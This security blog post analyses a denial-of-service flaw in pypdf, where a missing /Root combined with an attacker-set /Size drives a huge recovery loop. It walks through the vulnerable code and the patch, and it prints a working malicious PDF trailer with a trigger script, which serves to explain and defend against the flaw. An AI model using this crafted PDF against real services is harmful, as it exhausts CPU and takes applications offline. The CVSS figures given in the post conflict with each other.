GHSA-4XC4-762W-M6CG

Infinite Loops in the Library: Breaking pypdf with Polite Parsing

Alon Barad
Alon Barad
Software Engineer

Jan 11, 2026·5 min read

Executive Summary (TL;DR)

pypdf attempts to be helpful by recovering broken PDFs that lack a valid Root object. However, it determines how hard to search based on the file's own metadata (`/Size`). An attacker can set this size to billions, forcing the library into an infinite CPU-consuming loop looking for a phantom object.

A Denial of Service vulnerability in the pypdf library caused by an uncontrolled loop during the recovery of malformed PDF files.

The Hook: Kindness Kills

There is an old adage in software engineering known as Postel's Law: "Be conservative in what you do, be liberal in what you accept from others." It sounds noble. It sounds robust. In the security world, however, we often call this "attack surface expansion."

pypdf, one of the most popular Python libraries for manipulating PDFs (used in everything from banking OCR pipelines to those trendy AI RAG chatbots), fell victim to its own benevolence. When you feed pypdf a pristine PDF, it works great. But when you feed it a broken PDF—specifically one missing its Document Catalog (the /Root)—it doesn't just error out. It tries to fix it for you.

This recovery mechanism is the heart of CVE-2026-22690. The library assumes that if the map is broken, it can just walk the entire territory to find the destination. The problem? The attacker gets to define the size of the territory.

The Flaw: Trusting the Map Legend

To understand this bug, you need to know a tiny bit about PDF structure. A PDF ends with a trailer dictionary. This trailer tells the parser where to find the xref table (the index of objects) and, crucially, which object is the /Root. The /Root is the entry point to the document hierarchy.

But what if the /Root key is missing? In default mode (non-strict), pypdf engages a fallback routine. It decides to iterate through every possible object ID to see if it looks like a Catalog.

Here is the fatal logic error: To know how many objects to scan, pypdf looks at the /Size key in the trailer. This key is supposed to represent the total number of objects in the file. Since the trailer is user-controlled input, an attacker can set /Size to 2,147,483,647 (INT_MAX) without actually providing that many objects.

When pypdf sees this, it essentially says, "Okay, I will now attempt to parse and validate 2 billion objects to find your missing root." It loops. It fails to find an object. It catches the exception. It loops again. This burns CPU cycles faster than a crypto miner, locking up the thread indefinitely.

The Code: The Smoking Gun

Let's look at the vulnerable logic in pypdf/_reader.py. This is a classic case of an unbounded loop controlled by untrusted input.

# VULNERABLE CODE (Simplified)
# The 'nb' variable is taken directly from the file trailer
nb = cast(int, self.trailer.get("/Size", 0))
 
# The loop runs from 0 to the attacker-supplied size
for i in range(nb):
    try:
        # Attempt to parse object #i
        o = self.get_object(i + 1)
    except Exception:
        # If it fails, swallow the error and keep going
        o = None
    
    # Check if we accidentally found the Root
    if isinstance(o, DictionaryObject) and o.get("/Type") == "/Catalog":
        self._validated_root = o
        break

If I give you a file that is 1KB in size, but I set /Size to 100,000,000, this loop runs 100 million times. The try/except block makes it worse because exception handling in Python is relatively expensive compared to standard control flow.

The fix, applied in commit 294165726b646bb7799be1cc787f593f2fdbcf45, introduces sanity. It caps the benevolence:

# PATCHED CODE
# Set a hard limit on how nice we are willing to be
limit = self.root_object_recovery_limit  # defaults to 10,000
 
for i in range(nb):
    if i > limit:
        raise LimitReachedError("Root object not found within limit")
    # ... existing logic ...

They also optimized the search mechanism, but the hard limit is the real mitigation here.

The Exploit: Crafting the Death PDF

You don't need complex fuzzing tools to exploit this. You just need a text editor. A PDF is partially ASCII, and the trailer is usually readable at the end of the file.

Here is the recipe for a denial-of-service payload:

  1. Take a valid, minimal PDF.
  2. Delete the /Root entry from the trailer dictionary.
  3. Set the /Size entry to a massive integer.

Your file might look like this:

%PDF-1.7
1 0 obj
<< /Type /Page >>
endobj
xref
0 1
0000000000 65535 f 
trailer
<<
  /Size 999999999  % <--- The Weapon
  % /Root is intentionally missing
>>
startxref
10
%%EOF

When a victim script runs:

from pypdf import PdfReader
reader = PdfReader("malicious.pdf")
# Triggers the property access
print(reader.pages[0]) 

The process will hang. On a single core, it pins the CPU to 100%. In a web server context (like Gunicorn or uWSGI), sending a few of these requests will starve all worker threads, effectively taking the application offline.

The Mitigation: Stop the Bleeding

The primary fix is to upgrade pypdf. Version 6.6.0 introduces the root_object_recovery_limit which defaults to 10,000. This turns an infinite hang into a split-second search that fails gracefully.

If you cannot upgrade immediately (perhaps you are pinned to an older version due to dependencies), you have a configuration-level workaround: Strict Mode.

# Workaround for older versions
reader = PdfReader("untrusted.pdf", strict=True)

When strict=True is set, pypdf refuses to engage in the "guess the root object" game. If the /Root is missing from the trailer, it raises an exception immediately rather than entering the vulnerable recovery loop.

[!NOTE] This vulnerability highlights a crucial lesson for parser developers: Never loop on user-controlled integers without an upper bound. Trusting metadata to define loop constraints is a recipe for resource exhaustion.

Fix Analysis (1)

Technical Appendix

CVSS Score
6.9/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U
EPSS Probability
0.04%
Top 87% most exploited

Affected Systems

Python applications using pypdf < 6.6.0Document processing pipelinesRAG (Retrieval-Augmented Generation) ingestion servicesEmail attachment scanners

Affected Versions Detail

Product
Affected Versions
Fixed Version
pypdf
py-pdf
< 6.6.06.6.0
AttributeDetail
CWE IDCWE-400
Attack VectorNetwork (via File Upload)
CVSS v42.7 (Low)
ImpactDenial of Service (CPU Exhaustion)
EPSS Score0.00042 (Low Probability)
Patch StatusReleased (v6.6.0)
CWE-400
Uncontrolled Resource Consumption

The product does not properly control the allocation and maintenance of a limited resource, thereby enabling an actor to influence the amount of resources consumed, eventually leading to the exhaustion of available resources.

Vulnerability Timeline

Vulnerability Published
2026-01-09
Patch Merged (Commit 2941657)
2026-01-09
Version 6.6.0 Released
2026-01-09

Subscribe to updates

Get the latest CVE analysis reports delivered to your inbox.